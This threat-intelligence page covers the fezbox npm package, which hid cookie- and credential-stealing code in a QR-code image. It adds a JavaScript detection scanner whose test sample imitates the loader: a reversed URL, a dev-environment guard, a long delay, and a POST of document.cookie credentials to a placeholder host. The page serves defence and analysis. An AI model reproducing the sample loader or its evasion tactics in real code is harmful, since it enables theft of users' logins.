
Fezbox QR-code cookie-stealing malware activity

Malware Activity
Happening score: 22
2 unique sources, 2 articles

Summary


The fezbox npm package was found delivering cookie-stealing malware through a QR code hidden in a JPG, creating a supply-chain risk for JavaScript and Node.js users. The payload reads document.cookie, extracts username and password values from it, and exfiltrates them over HTTPS to a remote Railway host. Socket Threat Research identified the package on npmjs.com; it was later removed and flagged as malware after at least 327 downloads.

Related Happenings

LofyGang Minecraft LofyStealer campaign

Campaign
First: 28.04.2026 20:39 Last: 28.04.2026 20:39 Sources 1

About this happening: The **LofyGang** crew has re-emerged with a **Minecraft-player targeting** operation that uses **LofyStealer (GrabBot)**, increasing the risk of **credential and payment-data thef...

PhantomRaven malicious npm package waves

Malware Activity
First: 11.03.2026 19:09 Last: 11.03.2026 19:09 Sources 1

About this happening: The **PhantomRaven** malware operation is still pushing malicious **npm packages** into the **npm registry**, keeping the risk of developer-machine compromise and data theft activ...

IndonesianFoods self-replicating npm spam campaign

Campaign
First: 13.11.2025 06:58 Last: 13.11.2025 06:58 Sources 1

About this happening: The **IndonesianFoods** campaign has published **46,484 fake npm packages** since **early 2024**, flooding the **npm registry** and creating **supply-chain risk** for developers....

MUT-4831 Vidar Stealer npm supply-chain campaign

Campaign
First: 07.11.2025 08:48 Last: 07.11.2025 08:48 Sources 1

About this happening: A **MUT-4831** supply-chain campaign pushed **17 npm packages** that masqueraded as SDKs and silently delivered **Vidar Stealer**, expanding theft risk through the **npm registry*...

Socket Threat Research deconstructs fezbox QR-steganography and cookie-stealing payload

Technical Analysis
First: 24.09.2025 11:55 Last: 24.09.2025 11:55 Sources 1

How related: When deconstructing the code, the Socket Threat Research team found several layers of obfuscation (a reversed string, the QR code itself, and an obfuscated payload) that had to be peeled back before they could examine the payload code itself.

About this happening: **Socket Threat Research** deconstructed the malicious **fezbox** package and uncovered **QR-code steganography** plus layered obfuscation that hid **cookie-stealing code**, raisi...

Timeline

  1. 23.09.2025 13:42 · 2 articles

    fezbox QR-code payload steals cookies and credentials

    Technical Analysis Update

    The fezbox npm package contains an obfuscated loader that fetches a JPG containing a QR code, waits 120 seconds, then decodes the QR code into further obfuscated code that reads document.cookie, extracts the username and password, and sends the stolen data via HTTPS POST to https://my-nest-app-production[.]up[.]railway[.]app/users. The loader stores the Cloudinary image URL as a reversed string and checks for a development environment before running, so the payload stays dormant where it is most likely to be inspected; both are stealth tactics to evade analysis.

  2. 23.09.2025 13:42 · 2 articles

    Socket identifies the malicious npm package fezbox

    Initial Disclosure

    Socket Threat Research Team identified a malicious npm package named fezbox on npmjs.com, and BleepingComputer confirmed the payload in dist/fezbox.cjs version 1.3.0. The package had at least 327 downloads before npmjs.com removed it.

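The loader pattern described in the summary and in the first timeline entry (a URL stored as a reversed string, a long delay before execution, a development-environment guard, a read of document.cookie, and an HTTPS POST to a remote host) is a set of static indicators that a registry scanner or a pre-install hook can look for. The following is an added example written for this page; it is not Socket Threat Research's tooling and contains no code from the fezbox package. The two scanned sources are constructed for the example (the malicious one mimics the described shape with placeholder `example.invalid` hostnames and is not the real loader), and the indicator names, the 60-second delay threshold and the verdict rules are this example's own assumptions.

```javascript
// Added example for this page (not code from the fezbox package or from
// Socket Threat Research): a static scan of a JavaScript source for the
// indicator pattern described in the fezbox write-up. Indicator names, the
// 60 s delay threshold and the verdict rules are this example's own choices.

// Constructed sample in the shape the write-up describes, with placeholder
// hostnames; it is NOT the real fezbox loader. The first literal is
// "https://example.invalid/img/qr.jpg" written backwards.
const SAMPLE_MALICIOUS = `
const u = "gpj.rq/gmi/dilavni.elpmaxe//:sptth";
if (process.env.NODE_ENV !== "development") {
  setTimeout(async () => {
    const img = await fetch([...u].reverse().join(""));
    const creds = parseCreds(document.cookie);
    await fetch("https://collector.example.invalid/users", {
      method: "POST", body: JSON.stringify(creds) });
  }, 120000);
}
`;

// Constructed benign sample: a short timer, no cookie or network access.
const SAMPLE_BENIGN = `
export function greet(name) { return "hello " + name; }
setTimeout(() => console.log("tick"), 500);
`;

// Return the top-level argument texts of every `fnName(...)` call in src.
// Balances brackets and skips over string literals; it is a heuristic, not a
// JavaScript parser, and cannot see calls hidden behind eval/Function.
function callArgs(src, fnName) {
  const calls = [];
  const re = new RegExp('\\b' + fnName + '\\s*\\(', 'g');
  let m;
  while ((m = re.exec(src)) !== null) {
    let i = m.index + m[0].length;
    let depth = 1;
    let cur = '';
    const args = [];
    while (i < src.length) {
      const ch = src[i];
      if (ch === '"' || ch === "'" || ch === '`') {
        let j = i + 1;                          // copy the literal verbatim
        while (j < src.length && src[j] !== ch) j += src[j] === '\\' ? 2 : 1;
        cur += src.slice(i, j + 1);
        i = j + 1;
        continue;
      }
      if ('([{'.includes(ch)) depth++;
      else if (')]}'.includes(ch)) depth--;
      if (depth === 0) break;                   // closing paren of the call
      if (ch === ',' && depth === 1) { args.push(cur.trim()); cur = ''; }
      else cur += ch;
      i++;
    }
    if (cur.trim()) args.push(cur.trim());
    calls.push(args);
  }
  return calls;
}

const INDICATORS = [
  // A string literal that becomes an http(s) URL when reversed (the fezbox
  // loader stored its image URL backwards).
  { name: 'reversed-url-literal', test: (src) => {
      const lit = /(["'`])((?:\\.|(?!\1)[^\\])*)\1/g;
      let m;
      while ((m = lit.exec(src)) !== null) {
        const rev = [...m[2]].reverse().join('');
        if (/^https?:\/\//.test(rev)) return rev;
      }
      return null;
  } },
  // Direct read of document.cookie.
  { name: 'document-cookie-read',
    test: (src) => (/\bdocument\s*\.\s*cookie\b/.test(src) ? 'document.cookie' : null) },
  // setTimeout with a literal delay of a minute or more (fezbox waited 120 s).
  { name: 'long-delay', test: (src) => {
      for (const args of callArgs(src, 'setTimeout')) {
        const ms = Number(args[args.length - 1]);
        if (Number.isFinite(ms) && ms >= 60000) return 'setTimeout ' + ms + ' ms';
      }
      return null;
  } },
  // Refuses to run when NODE_ENV looks like a development environment.
  { name: 'dev-env-guard',
    test: (src) => (/process\s*\.\s*env\s*\.\s*NODE_ENV\s*[!=]==?\s*["']development["']/.test(src)
      ? 'NODE_ENV check' : null) },
  // fetch() with a POST init object: candidate exfiltration channel.
  { name: 'http-post-exfil', test: (src) => {
      for (const [url, init] of callArgs(src, 'fetch')) {
        if (init && /method\s*:\s*["']POST["']/i.test(init)) return url;
      }
      return null;
  } },
];

// Run every indicator and collect the ones that fired, with their evidence.
function scan(src) {
  const findings = [];
  for (const ind of INDICATORS) {
    const evidence = ind.test(src);
    if (evidence) findings.push({ name: ind.name, evidence });
  }
  return findings;
}

// A cookie read plus an outbound POST is enough to block an install; any two
// indicators are worth a human look.
function verdict(findings) {
  const names = new Set(findings.map((f) => f.name));
  if (names.has('document-cookie-read') && names.has('http-post-exfil')) return 'block';
  return names.size >= 2 ? 'review' : 'clean';
}

for (const [label, src] of [['malicious sample', SAMPLE_MALICIOUS], ['benign sample', SAMPLE_BENIGN]]) {
  const findings = scan(src);
  console.log(label + ': ' + verdict(findings), findings);
}
```

The scanner deliberately stops at the loader stage: it does not fetch the image or decode the QR code, because the point of a pre-install check is to refuse the package before any network activity happens. A real loader can also hide the same steps behind base64, `eval`, or a computed delay such as `120 * 1000`, none of which this text-level heuristic sees, so treat a clean result as "nothing obvious" rather than "safe".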